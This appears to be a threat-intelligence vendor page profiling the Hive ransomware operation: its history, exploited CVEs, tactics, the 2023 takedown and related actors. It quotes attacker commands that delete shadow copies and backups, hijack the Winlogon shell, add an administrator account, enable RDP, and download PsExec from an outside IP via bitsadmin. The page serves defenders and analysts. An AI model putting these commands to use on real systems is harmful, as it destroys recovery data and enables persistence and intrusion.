Hive is a ransomware family first observed in June 2021 and distributed through a ransomware-as-a-service operation. Its developers maintained the malware and supporting infrastructure, while affiliates compromised organizations and deployed encryptors. Hive targeted businesses worldwide across government, communications, critical manufacturing, information technology, and particularly healthcare and public health. By November 2022, Hive actors had victimized more than 1,300 companies and received approximately US$100 million in ransom payments.
Affiliates obtained initial access through exposed or inadequately protected RDP and VPN services, compromised VPN credentials, phishing emails with malicious attachments, and exploitation of FortiOS and Microsoft Exchange vulnerabilities. Documented exploitation included the FortiOS multifactor-authentication bypass CVE-2020-12812 and Exchange vulnerabilities CVE-2021-31207, CVE-2021-34473, CVE-2021-34523, and CVE-2021-42321. Affiliates also abused legitimate remote monitoring and management tools for persistence and detection evasion.
Hive encrypts files and impedes recovery by terminating backup and security processes, disabling antivirus protections, deleting volume shadow copies, clearing Windows event logs, and disabling recovery settings. It creates machine-specific key material required for decryption and places ransom instructions in affected directories. Variants target Windows, Linux, VMware ESXi, and FreeBSD. The operation used double extortion, combining encryption with data theft and threats to publish stolen information through its HiveLeaks site. Operators negotiated payments through a Tor-accessible chat interface and demanded Bitcoin; some victims also received telephone calls or emails.
An international law-enforcement action seized Hive infrastructure in January 2023, ending the original operation. Before the public seizure, the FBI infiltrated its infrastructure and covertly supplied decryption keys to victims.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
9 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Hive actors have bypassed multifactor authentication (MFA) and gained access to FortiOS servers by exploiting Common Vulnerabilities and Exposures (CVE) CVE-2020-12812.
Hive actors gain access to victim network by exploiting the following Microsoft Exchange vulnerabilities: CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, CVE-2021-42321.
Hive actors have also gained initial access to victim networks ... by exploiting the following vulnerabilities against Microsoft Exchange servers: ... CVE-2021-34473 ... - Microsoft Exchange Server Remote Code Execution Vulnerability.
Hive actors have also gained initial access to victim networks ... by exploiting the following vulnerabilities against Microsoft Exchange servers: CVE-2021-31207 ... - Microsoft Exchange Server Security Feature Bypass Vulnerability.
CVE-2021-34523 - Microsoft Exchange Server Privilege Escalation Vulnerability
the following three ransomware families are being observed in the majority of recent attacks: Similar to many other ransomware families, Hive, Conti, and Avoslocker follow the ransomware-as-a-service (RaaS) business model.
the following three ransomware families are being observed in the majority of recent attacks: Similar to many other ransomware families, Hive, Conti, and Avoslocker follow the ransomware-as-a-service (RaaS) business model.
the following three ransomware families are being observed in the majority of recent attacks: Similar to many other ransomware families, Hive, Conti, and Avoslocker follow the ransomware-as-a-service (RaaS) business model.
the following three ransomware families are being observed in the majority of recent attacks: Similar to many other ransomware families, Hive, Conti, and Avoslocker follow the ransomware-as-a-service (RaaS) business model.
6 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
From June 2021 through at least November 2022, threat actors have used Hive ransomware to target a wide range of businesses and critical infrastructure sectors, including Government Facilities, Communications, Critical Manufacturing, Information Technology, and especially Healthcare and Public Health (HPH).
Hive ransomware is only about one year old, having been first observed in June 2021, but it has grown into one of the most prevalent ransomware payloads in the ransomware as a service (RaaS) ecosystem.
Indictments returned in New Jersey and the District of Columbia allege that Matveev was involved in a conspiracy to distribute ransomware from three different strains or affiliate groups, including Babuk, Hive and LockBit.
DEV-0237 heavily used Ryuk and Conti payloads from Trickbot LLC/DEV-0193, then Hive payloads more recently.
Authorities say Matveev played a major role in the development and deployment of the Hive, LockBit and Babuk ransomware variants...
...delivering various ransomware payloads over the years, including Hive, BlackCat (ALPHV), Hunters International, LockBit, and Embargo ransomware.
35 distinct techniques documented for this family, organized by ATT&CK tactic.
It also comes with support for a single command line parameter (-no-wipe). In contrast, Hive's Windows ransomware comes with up to 5 execution options, including killing processes and skipping disk cleaning, uninteresting files, and older files.
"vssadmin.exe delete shadows /all /quiet" "wmic.exe shadowcopy delete" "wbadmin.exe delete systemstatebackup"
The new variant uses a different set of algorithms: Elliptic Curve Diffie-Hellmann (ECDH) with Curve25519 and XChaCha20-Poly1305
Execute batch scripts (file1.bat)... Changes the Windows Shell from Explorer to their malicious script (file2.bat) Reboots the system
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "C:\windows\file2.bat" /f
net user <REDACTED> <REDACTED> /add ... net localgroup Administrators <REDACTED> /add
Execute batch scripts (file1.bat)... Changes the Windows Shell from Explorer to their malicious script (file2.bat) Reboots the system
The new Hive variant uses string encryption that can make it more evasive. Strings reside in the .rdata section and are decrypted during runtime by XORing with constants.
As part of its ransomware activity, Hive typically runs processes that delete backups and prevent recovery.
Hive tries to impersonate the process tokens of trustedinstaller.exe and winlogon.exe so it can stop Microsoft Defender Antivirus, among other services.
"C:\windows\7zr.exe" x c:\windows\int.7z -p123 -oc:\windows
"C:\Windows\system32\bitsadmin.exe" /transfer debjob /download /priority normal http://79.137.206.47/PsExec.exe C:\Users\Public\PsExec.exe
Rapid7 observed that the HIVE payload would not execute unless a flag of -u was passed.
By targeting virtual machines, ransomware operators can also encrypt multiple servers at once with a single command. In June, researchers spotted a new REvil ransomware Linux encryptor designed to target VMware ESXi virtual machines, a popular enterprise virtual machine platform.
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "C:\windows\file2.bat" /f
Like most sophisticated malware, Hive stops services and processes associated with security solutions and other tools that might get in the way of its attack chain. Hive tries to impersonate the process tokens of trustedinstaller.exe and winlogon.exe so it can stop Microsoft Defender Antivirus, among other services.
The main function of the Trigger is to listen to all traffic ... Use the function call socket( PF_PACKET, SOCK_RAW, htons( ETH_P_IP ) ) to set RAW SOCKET to capture IP messages | Trigger is to monitor the NIC traffic to identify specific messages that conceal the Trigger C2
Based on the stop flag, the malware connects to the Windows service control manager and proceeds to stop services matching the regex provided.
The main function of the Trigger is to listen to all traffic ... Use the function call socket( PF_PACKET, SOCK_RAW, htons( ETH_P_IP ) ) to set RAW SOCKET to capture IP messages | Trigger is to monitor the NIC traffic to identify specific messages that conceal the Trigger C2
The discovery module will use NetServerEnum to identify available Windows hosts within the domain/workgroup. This list is then used with NetShareEnum to identify file shares on each remote host
By targeting virtual machines, ransomware operators can also encrypt multiple servers at once with a single command. In June, researchers spotted a new REvil ransomware Linux encryptor designed to target VMware ESXi virtual machines, a popular enterprise virtual machine platform.
The malicious actor then began using the remote process execution tool PSExec to execute batch files (rdp.bat) that would cause registry changes to enable Remote Desktop sessions (RDP). This enabled the malicious actor to laterally move throughout the victim’s environment using the graphical user interface.
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
The disclosure comes as the U.S. Federal Bureau of Investigation (FBI) released a Flash report detailing the tactics of a new Ransomware-as-a-Service (RaaS) outfit known as Hive, consisting of a number of actors who are using multiple mechanisms to compromise business networks, exfiltrate data and encrypt data on the networks, and attempt to collect a ransom in exchange for access to the decryption software.
The other new flags -low-key, --low-key will cause the ransomware to focus on only its encryption of data and not perform pre-encryption tasks, including deleting shadow copies... deleting backup catalogs
The Hive ransomware gang now also encrypts Linux and FreeBSD using new malware variants specifically developed to target these platforms.
Hive stops the following services: windefend, msmpsvc, kavsvc... veeam, backup, vss, msexchange, mysql...
126 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
131 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Dismantled ransomware operation with TTP similarities to Play and suspected rebranding links to Hunters International.
Ransomware operation cited as a case where the FBI infiltrated the group’s infrastructure, monitored operations, and secretly distributed decryption keys to victims before takedown.
Named as one of the ransomware families with low prevention rates in the testing data; no further technical detail provided.
Mentioned only as another ransomware family using Rust.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.